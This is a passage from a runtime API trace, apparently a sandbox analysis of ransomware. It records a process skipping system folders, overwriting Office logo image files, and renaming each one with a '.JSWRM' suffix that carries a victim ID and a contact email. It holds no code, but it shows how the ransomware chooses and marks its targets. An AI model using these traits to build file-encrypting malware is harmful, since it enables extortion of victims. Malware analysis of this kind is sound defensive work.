CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.863] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1759) returned 1 [0132.863] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.863] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6d0, lpOverlapped=0x0) returned 1 [0132.864] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.864] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6d0, lpOverlapped=0x0) returned 1 [0132.864] CloseHandle (hObject=0x238) returned 1 [0132.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.866] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-white_scale-140.png", cAlternateFileName="GRF6AB~1.PNG")) returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.866] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-140.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-140.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 44 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-140.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-140.png", cchWideChar=44, lpMultiByteStr=0x22ce70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 44 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.867] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2048) returned 1 [0132.867] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.867] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0132.871] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.871] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0132.871] CloseHandle (hObject=0x238) returned 1 [0132.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.872] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa03, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-white_scale-180.png", cAlternateFileName="GRC8DD~1.PNG")) returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.872] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-180.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-180.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 44 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-180.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-180.png", cchWideChar=44, lpMultiByteStr=0x22d298, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 44 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.873] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2563) returned 1 [0132.874] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.874] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa00, lpOverlapped=0x0) returned 1 [0132.875] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.875] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa00, lpOverlapped=0x0) returned 1 [0132.884] CloseHandle (hObject=0x238) returned 1 [0132.885] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.886] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-white_scale-80.png", cAlternateFileName="GRE586~1.PNG")) returned 1 [0132.886] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.887] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-80.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-80.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 43 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-80.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-80.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 43 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.888] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1488) returned 1 [0132.888] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.888] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5d0, lpOverlapped=0x0) returned 1 [0132.891] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.891] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5d0, lpOverlapped=0x0) returned 1 [0132.891] CloseHandle (hObject=0x238) returned 1 [0132.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.893] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa56, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.scale-100.png", cAlternateFileName="GREDEF~1.PNG")) returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2=".") returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="..") returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="...") returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="windows") returned -1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0132.893] lstrcmpiW (lpString1="GrooveLogoSmall.scale-100.png", lpString2="msocache") returned -1 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-100.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-100.png", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 29 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-100.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-100.png", cchWideChar=29, lpMultiByteStr=0x2413d0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 29 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.894] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2646) returned 1 [0132.894] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.894] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0132.896] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.896] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0132.896] CloseHandle (hObject=0x238) returned 1 [0132.896] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.897] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd76, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.scale-140.png", cAlternateFileName="GR1CBD~1.PNG")) returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2=".") returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="..") returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="...") returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="windows") returned -1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0132.897] lstrcmpiW (lpString1="GrooveLogoSmall.scale-140.png", lpString2="msocache") returned -1 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-140.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-140.png", cchWideChar=29, lpMultiByteStr=0x241060, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 29 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-140.png", cchWideChar=29, lpMultiByteStr=0x0, 